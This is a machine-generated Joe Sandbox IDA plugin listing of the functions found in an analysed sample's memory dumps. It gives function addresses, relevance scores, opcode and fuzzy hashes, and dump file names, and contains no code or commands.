                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $
                                                  • API String ID: 0-3993045852
                                                  • Opcode ID: 3452df453a80c176335711781267f28b32f831d86a00d8f0aef113e1f7ddbf34
                                                  • Instruction ID: 6dd9b715947a76ab4e32dcec5ef79f5da35cfd161dd3b5b18e31db241b19db37
                                                  • Opcode Fuzzy Hash: 3452df453a80c176335711781267f28b32f831d86a00d8f0aef113e1f7ddbf34
                                                  • Instruction Fuzzy Hash: 3131AA32418B160FCB1DEE7CA9D10BBB7D2FBD2321B50873EA593424D9D77851168A81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00D3B8E5 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (
                                                  • API String ID: 0-3887548279
                                                  • Opcode ID: 5ae205f69e5752b3fbacac3190595bc2f4a33ffa0abb4c1e50c8bf770a6c5a80
                                                  • Instruction ID: 04f246208a4d5ccaef0f561cd1575d7998d44f550c215bded616682c6cd11614
                                                  • Opcode Fuzzy Hash: 5ae205f69e5752b3fbacac3190595bc2f4a33ffa0abb4c1e50c8bf770a6c5a80
                                                  • Instruction Fuzzy Hash: B941973140831A8FC314EF7D95949A6BBE2EFC4324F51193C85C2CB5E2D738911A8B82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C3288B Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .
                                                  • API String ID: 0-248832578
                                                  • Opcode ID: fa452eb2dc22b8c8e0cd506537e9705b55dee3e6e96229639f85abb04f052c9d
                                                  • Instruction ID: 9d65a16ea204d0d22c9edc25ad053f1a9b14d321c19d8f75bd886a874ef98027
                                                  • Opcode Fuzzy Hash: fa452eb2dc22b8c8e0cd506537e9705b55dee3e6e96229639f85abb04f052c9d
                                                  • Instruction Fuzzy Hash: 3E3166366482108FD318DF64D4A49BBB3E2FBC8350F51C56EE48AD7684DB30E65ACB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00CFD3C4 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: '
                                                  • API String ID: 0-890313949
                                                  • Opcode ID: ee3a1142536d941182bf7413053bb0deb29d22259a5842a76d7cd7df5884a38e
                                                  • Instruction ID: 629af024d989734f8217724f69553016add46d94a4a49430c3607c82250a6085
                                                  • Opcode Fuzzy Hash: ee3a1142536d941182bf7413053bb0deb29d22259a5842a76d7cd7df5884a38e
                                                  • Instruction Fuzzy Hash: 7F317C761146134BD32DAA3C98A15F7B392EBC5320F50DB3D90A2C78D5CB78950BD740
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00BF4D23 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: A
                                                  • API String ID: 0-3554254475
                                                  • Opcode ID: 2d702ecada7b075b150a96c7dc08452537e4a0932c90bf542816fc49396d2020
                                                  • Instruction ID: 11bdbede471a4eb1bf0a34785dc7477b117876ee25969b8e404fb73d4a55fbed
                                                  • Opcode Fuzzy Hash: 2d702ecada7b075b150a96c7dc08452537e4a0932c90bf542816fc49396d2020
                                                  • Instruction Fuzzy Hash: C0217B3920464B4BC72CEF35D4225FA73A6FF86320B50636EF5928B0C0DB294155CB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00DC0391 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: w
                                                  • API String ID: 0-476252946
                                                  • Opcode ID: 1027466e525880f963a4c4d0d47963466ee8d0823b51f73e213fddd22b7ebfce
                                                  • Instruction ID: 16264e96e70416ae2c4cca9c2312e10271e195a5d6a48b7b0fb4af89ad001bca
                                                  • Opcode Fuzzy Hash: 1027466e525880f963a4c4d0d47963466ee8d0823b51f73e213fddd22b7ebfce
                                                  • Instruction Fuzzy Hash: 522138253156228BEB089A7998D56F677D3EBC1330F60C73C5556C36D9D73D880B9B02
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B6AA48 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: E
                                                  • API String ID: 0-3568589458
                                                  • Opcode ID: 58e7d48350898f1eaeae5212d73045b7b00bd96a55ccb4cb129e4430659322be
                                                  • Instruction ID: 691e7b0de07748f0e6705708bbfa6a6506233e9071ae1b4bd75dd4eda2d64b55
                                                  • Opcode Fuzzy Hash: 58e7d48350898f1eaeae5212d73045b7b00bd96a55ccb4cb129e4430659322be
                                                  • Instruction Fuzzy Hash: 25116DB54097454BC70CAE3CCC650EBB7A6EBC1324F15CB3EA667CB2D1D62E8009DA02
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AFFFA2 Relevance: 1.3, Strings: 1, Instructions: 12COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `auo
                                                  • API String ID: 0-3694295154
                                                  • Opcode ID: 5bbcaf2978bf0d03e9e99e917532002e03fc0f1f2ead5c9054803f2a660d21a5
                                                  • Instruction ID: 3eddd23a08e3911a69fcb413a49d7a999a87a08f442dfe30c3452b87a0d65be1
                                                  • Opcode Fuzzy Hash: 5bbcaf2978bf0d03e9e99e917532002e03fc0f1f2ead5c9054803f2a660d21a5
                                                  • Instruction Fuzzy Hash: 9AC04C35548101CBC729AF24FCD587A7378AB572157553418D517DB262CF5098428909
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF7E40 Relevance: .8, Instructions: 825COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7efd84edb0efe2b3d8a9f91c137baf9a528549c810e970216e2099b4ff06292e
                                                  • Instruction ID: 6d3d4676dd01d1dd1693fe08efc8bd4d38e8054211c0c8534e7276a0b310aa45
                                                  • Opcode Fuzzy Hash: 7efd84edb0efe2b3d8a9f91c137baf9a528549c810e970216e2099b4ff06292e
                                                  • Instruction Fuzzy Hash: 0542063150871A8BC720DF98D8806BAF3E1FFD4305F144A2DEAD687241EB39E955CB86
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B15EDD Relevance: .8, Instructions: 807COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 5326bea0edd915634e0b6b5aadd8860514ad72f3456c6875e734422bef7c0e24
                                                  • Instruction ID: 76758d5fc820598db5af5fae5c42ea4f5d91753db35bbf115f06c438750b3cce
                                                  • Opcode Fuzzy Hash: 5326bea0edd915634e0b6b5aadd8860514ad72f3456c6875e734422bef7c0e24
                                                  • Instruction Fuzzy Hash: A752AA70604B418BD329CF24C4A47A6BBE2FF56304F988AADD4E74BB91D739B445CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF3660 Relevance: .7, Instructions: 658COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 862715423f0937bfd1ac9bb4a187d3c0c0161c581f742c7f5264b19ff20f1bdd
                                                  • Instruction ID: 0eea1dfd8eb77f58eabe3de17483c2d9e08c52c08775af802228b231310b4bf6
                                                  • Opcode Fuzzy Hash: 862715423f0937bfd1ac9bb4a187d3c0c0161c581f742c7f5264b19ff20f1bdd
                                                  • Instruction Fuzzy Hash: 1642DD726087448FCB24CF6AC090677F7E2BF84314F188A2DE5DA8B251D734EA4ACB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF1000 Relevance: .5, Instructions: 523COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ed16e418476e404c5f1435624526dc9b57fc09ccd00a489c271fa7f1fba4761b
                                                  • Instruction ID: 6d5c5bcc9ceb72bffadbae1add93fd799e8d6fb7dcaa5ba9910473ffeda4d68f
                                                  • Opcode Fuzzy Hash: ed16e418476e404c5f1435624526dc9b57fc09ccd00a489c271fa7f1fba4761b
                                                  • Instruction Fuzzy Hash: 06121770508789CBD730CF99C0903B7BBE1AB91311F188A1EF6D58B692D339D989D782
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF6350 Relevance: .5, Instructions: 473COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 20b3c874ae2deca06fff4844ea057a8bfd8e049c993c511525991cbdb36ee609
                                                  • Instruction ID: 2ed8d1dc4ec412879e80d11b39942434e5daad1394a45a63050a29cda4ab7719
                                                  • Opcode Fuzzy Hash: 20b3c874ae2deca06fff4844ea057a8bfd8e049c993c511525991cbdb36ee609
                                                  • Instruction Fuzzy Hash: 9B02D232608344CFCB18CF68C88166AFBE5EF99304F58496DFA998B352D775D805CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B01361 Relevance: .4, Instructions: 444COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1e48e40820ba58fa0f64c795dce0619e7e03434ec1b8a76946282ce42af4af33
                                                  • Instruction ID: 652d1abfd310399c8299dbd7b00d58fdded6aff877557d78f45641e376912ff8
                                                  • Opcode Fuzzy Hash: 1e48e40820ba58fa0f64c795dce0619e7e03434ec1b8a76946282ce42af4af33
                                                  • Instruction Fuzzy Hash: 01D18AB46107008FD729CF28C980B67BBE5FF5A300F5899ACE4968B791E775B844CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B167C9 Relevance: .4, Instructions: 437COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2b3ccb8113253a9b21305933e1e26ef4875d78f06d25942af218ade744bdf062
                                                  • Instruction ID: 021a1385d682903219a91f36750bec0275ba382566ed8ba571fbbdbbd859d566
                                                  • Opcode Fuzzy Hash: 2b3ccb8113253a9b21305933e1e26ef4875d78f06d25942af218ade744bdf062
                                                  • Instruction Fuzzy Hash: 27E15970504B418BD329CF35C0A47A7BBE2FF56304F988AAEC4E74BA91C779A545CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B1672D Relevance: .4, Instructions: 437COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 90b48929169612893f4b335b08b611b47abb55f1c8d55ed54a8d9973889a94f7
                                                  • Instruction ID: a9db891098c9c15e3de1d0e2c0337ad7aea2b01393b6ea8369ef1737f6d7fdf9
                                                  • Opcode Fuzzy Hash: 90b48929169612893f4b335b08b611b47abb55f1c8d55ed54a8d9973889a94f7
                                                  • Instruction Fuzzy Hash: BBE15970504B418BD329CF35C0A47A7BBE2FF56304F548AAEC4E74BA91C779A549CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B167BA Relevance: .4, Instructions: 391COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7086c6830c474ebacd28ed595aab8902512b6962270ac7678c26fd7389fbdef3
                                                  • Instruction ID: 4e3e6eaeec1fb1476d1aac428ffb992f5d924d8ea77911796b99dcf4b4ac3144
                                                  • Opcode Fuzzy Hash: 7086c6830c474ebacd28ed595aab8902512b6962270ac7678c26fd7389fbdef3
                                                  • Instruction Fuzzy Hash: D8D17970504B818BD326CF34C4A47A7BBE2FF56304F984A9EC4E74B695C739A44ACB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B0AAB0 Relevance: .3, Instructions: 333COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 837ca83b393a62ea23f30f7aa1090f1b7067a47fbf2f8309d9b71c90340612e7
                                                  • Instruction ID: 660357033b67639a9ee19cbf4ab0b0569ed2a11e58291eee973d3e1de956f555
                                                  • Opcode Fuzzy Hash: 837ca83b393a62ea23f30f7aa1090f1b7067a47fbf2f8309d9b71c90340612e7
                                                  • Instruction Fuzzy Hash: 2991BEB15043019BD720DF14CC92B7BBBE5FF95364F198AA8E8969B2D1E734E900C792
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B0A5E0 Relevance: .3, Instructions: 313COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
